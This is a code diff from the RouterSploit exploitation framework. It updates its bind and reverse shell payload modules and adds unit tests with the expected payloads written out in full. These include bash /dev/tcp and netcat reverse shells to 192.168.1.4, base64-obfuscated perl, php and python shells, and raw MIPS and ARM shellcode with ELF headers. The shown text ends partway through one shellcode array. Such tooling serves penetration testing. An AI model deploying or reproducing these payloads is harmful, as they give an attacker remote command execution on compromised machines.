"name": "Netcat Reverse TCP",
"description": "Creates interactive tcp reverse shell by using netcat.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/perl_bind_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(PerlBindTCP):
"name": "Perl Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using perl one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......@@ -16,5 +16,5 @@ class Exploit(PerlBindTCP):
def generate(self):
payload = super(Exploit, self).generate()
cmd = "{} -MIO -e '{}'".format(self.cmd, payload)
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload)
return cmd
routersploit/modules/payloads/cmd/perl_reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(PerlReverseTCP):
"name": "Perl Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using perl one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......@@ -16,5 +16,5 @@ class Exploit(PerlReverseTCP):
def generate(self):
payload = super(Exploit, self).generate()
cmd = "{} -MIO -e '{}'".format(self.cmd, payload)
cmd = "{} -MIO -e \"{}\"".format(self.cmd, payload)
return cmd
routersploit/modules/payloads/cmd/php_bind_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(PHPBindTCP):
"name": "PHP Bind TCP One-Liner",
"description": "Creates interactive tcp bind shell by using php one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/php_reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(PHPReverseTCP):
"name": "PHP Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using php one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/python_bind_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(PythonBindTCP):
"name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp bind shell by using python one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/python_reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(PythonReverseTCP):
"name": "Python Reverse TCP One-Liner",
"description": "Creates interactive tcp reverse shell by using python one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/mipsbe/bind_tcp.py
......@@ -11,7 +11,7 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "MIPSBE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSBE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/mipsbe/reverse_tcp.py
......@@ -11,7 +11,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "MIPSBE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSBE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/mipsle/bind_tcp.py
......@@ -11,7 +11,7 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "MIPSLE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSLE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/mipsle/reverse_tcp.py
......@@ -10,9 +10,9 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "MIPSLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for MIPSLE architecture.",
"authors": [
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
],
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.MIPSLE
......
routersploit/modules/payloads/perl/bind_tcp.py
from base64 import b64encode
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
......@@ -6,17 +7,18 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Perl Bind TCP",
"description": "Creates interactive tcp bind shell by using perl.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
def generate(self):
payload = (
"$p=fork();exit,if$p;foreach my $key(keys %ENV){" +
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
str(self.rport) +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};"
)
return payload
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
routersploit/modules/payloads/perl/reverse_tcp.py
from base64 import b64encode
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......@@ -6,13 +7,13 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Perl Reverse TCP",
"description": "Creates interactive tcp reverse shell by using perl.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
def generate(self):
payload = (
"$p=fork;exit,if($p);foreach my $key(keys %ENV){" +
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
self.lhost +
":" +
......@@ -20,4 +21,5 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
)
return payload
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
routersploit/modules/payloads/php/reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "PHP Reverse TCP",
"description": "Creates interactive tcp reverse shell by using php.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/python/bind_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Python Bind TCP",
"description": "Creates interactive tcp bind shell by using python.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/python/reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Python Reverse TCP",
"description": "Creates interactive tcp reverse shell by using python.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
tests/payloads/armle/test_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.armle.bind_tcp import Exploit
# armle bind tcp payload with rport=4321
bind_tcp = (
b"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d"
b"\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0"
b"\x8d\xe2\x00\x60\xa0\xe1\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01"
b"\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0"
b"\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d"
b"\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0"
b"\x8d\xe2\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d"
b"\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1"
b"\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0"
b"\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60"
b"\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01"
b"\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0"
b"\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0"
b"\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40"
b"\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07"
b"\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0"
b"\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d"
b"\xe2\x0b\x00\x90\xef"
)
# elf armle bind tcp
elf_armle_bind_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x00\x00\x00\x80\x00\x00\x58\x01\x00\x00\x5c\x02\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x02\x00\xa0\xe3\x01\x10"
b"\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d"
b"\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1"
b"\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01\x1c\xa0\xe1\x07\x18\x81"
b"\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10"
b"\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d\xe9\x02\x00\xa0\xe3\x0d"
b"\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x06\x00\xa0\xe1"
b"\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90"
b"\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20"
b"\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0\xe3\x0d\x10\xa0\xe1\x66"
b"\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x02\x10\xa0\xe3"
b"\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01\x10\x51\xe2\xfb\xff\xff"
b"\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0\x2f\x30\xa0\xe3\x62\x70"
b"\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0\xe3\x07\x38\x83\xe0\x6e"
b"\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40\xa0\xe3\x73\x70\xa0\xe3"
b"\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07\x48\x84\xe0\x73\x50\xa0"
b"\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0\x3e\x00\x2d\xe9\x08\x00"
b"\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d\xe2\x0b\x00\x90\xef"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_armle_bind_tcp
tests/payloads/armle/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.armle.reverse_tcp import Exploit
# armle reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f"
b"\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf"
b"\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92"
b"\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1"
b"\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00"
)
# elf armle reverse tcp
elf_armle_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x00\x00\x00\x80\x00\x00\x9c\x00\x00\x00\xe4\x00\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x01\x10\x8f\xe2\x11\xff"
b"\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06"
b"\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf\x3f\x27\x02\x21\x30\x1c"
b"\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92\x1a\x05\xb4\x69\x46\x0b"
b"\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1\xc0\xa8\x01\x04\x2f\x62"
b"\x69\x6e\x2f\x73\x68\x00"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_armle_reverse_tcp
tests/payloads/cmd/test_awk_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.awk_bind_tcp import Exploit
# awk bind tcp payload with rport=4321
bind_tcp = (
"awk 'BEGIN{s=\"/inet/tcp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
tests/payloads/cmd/test_awk_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.awk_reverse_tcp import Exploit
# awk reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"awk 'BEGIN{s=\"/inet/tcp/0/192.168.1.4/4321\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/cmd/test_bash_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.bash_reverse_tcp import Exploit
# bash reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"bash -i >& /dev/tcp/192.168.1.4/4321 0>&1"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/cmd/test_netcat_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.netcat_bind_tcp import Exploit
# netcat bind tcp payload with rport=4321
bind_tcp = (
"nc -lvp 4321 -e /bin/sh"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
tests/payloads/cmd/test_netcat_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Exploit
# netcat reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"nc 192.168.1.4 4321 -e /bin/sh"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/cmd/test_perl_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.perl_bind_tcp import Exploit
# perl bind tcp payload with rport=4321
bind_tcp = (
"perl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
tests/payloads/cmd/test_perl_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.perl_reverse_tcp import Exploit
# perl reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"perl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/cmd/test_php_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.php_reverse_tcp import Exploit
# php reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"php -r \"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/cmd/test_python_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.python_bind_tcp import Exploit
# python bind tcp payload with rport=4321
bind_tcp = (
"python -c \"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
tests/payloads/cmd/test_python_bind_udp.py
from routersploit.modules.payloads.cmd.python_bind_udp import Exploit
# bind udp payload with rport=4321
# python bind udp payload with rport=4321
bind_udp = (
"python -c \"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))\""
)
......
tests/payloads/cmd/test_python_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.cmd.python_reverse_tcp import Exploit
# python reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"python -c \"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))\""
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/cmd/test_python_reverse_udp.py
from routersploit.modules.payloads.cmd.python_reverse_udp import Exploit
# reverse udp payload with lhost=192.168.1.4 lport=4321
# python reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_udp = (
"python -c \"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))\""
)
......
tests/payloads/mipsbe/test_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.mipsbe.bind_tcp import Exploit
# mipsbe bind tcp payload with rport=4321
bind_tcp = (
b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28"
b"\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x30\x50"
b"\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01"
b"\xa0\x68\x27\x01\xcd\x68\x04\x24\x0e\x10\xe1\x01\xae\x68\x25"
b"\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff"
b"\xec\x02\x10\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5"
b"\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25\x24"
b"\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02\x10\x20\x25"
b"\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01"
b"\x0c\xaf\xa2\xff\xff\x24\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4"
b"\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24"
b"\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
b"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4"
b"\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24"
b"\x02\x0f\xab\x01\x01\x01\x0c"
)
# elf mipsbe bind tcp
elf_mipsbe_bind_tcp = (
b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00"
b"\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
b"\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x3c\x00\x00\x02"
b"\x24\x00\x00\x00\x07\x00\x00\x10\x00\x27\xbd\xff\xe0\x24\x0e"
b"\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28\x27\x28\x06\xff\xff\x24"
b"\x02\x10\x57\x01\x01\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef"
b"\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68"
b"\x04\x24\x0e\x10\xe1\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf\xa0"
b"\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10\x20\x25\x24"
b"\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49"
b"\x01\x01\x01\x0c\x02\x10\x20\x25\x24\x05\x01\x01\x24\x02\x10"
b"\x4e\x01\x01\x01\x0c\x02\x10\x20\x25\x28\x05\xff\xff\x28\x06"
b"\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24"
b"\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21"
b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22\x31\xff"
b"\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef"
b"\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf"
b"\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"
b"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01"
b"\x0c"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_mipsbe_bind_tcp
tests/payloads/mipsbe/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.mipsbe.reverse_tcp import Exploit
# mipsbe reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x28\x04\xff\xff\x24\x02\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11"
b"\x11\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80"
b"\x20\x27\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01"
b"\x80\x20\x27\x01\x80\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57"
b"\x01\x09\x09\x0c\x30\x44\xff\xff\x24\x02\x0f\xc9\x01\x09\x09"
b"\x0c\x24\x02\x0f\xc9\x01\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5"
b"\x10\xe1\xaf\xa5\xff\xf8\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf"
b"\xa5\xff\xfc\x23\xa5\xff\xf8\x24\x0c\xff\xef\x01\x80\x30\x27"
b"\x24\x02\x10\x4a\x01\x09\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62"
b"\x69\xaf\xa8\xff\xec\x3c\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8"
b"\xff\xf0\x28\x07\xff\xff\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23"
b"\xa4\xff\xec\x23\xa8\xff\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8"
b"\x27\xbd\xff\xec\x28\x06\xff\xff\x24\x02\x0f\xab\x00\x90\x93"
b"\x4c"
)
# elf mipsbe reverse tcp
elf_mipsbe_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00"
b"\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
b"\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x18\x00\x00\x01"
b"\xdc\x00\x00\x00\x07\x00\x00\x10\x00\x28\x04\xff\xff\x24\x02"
b"\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11\x11\x24\x02\x0f\xa6\x01"
b"\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80\x20\x27\x24\x02\x0f\xa6"
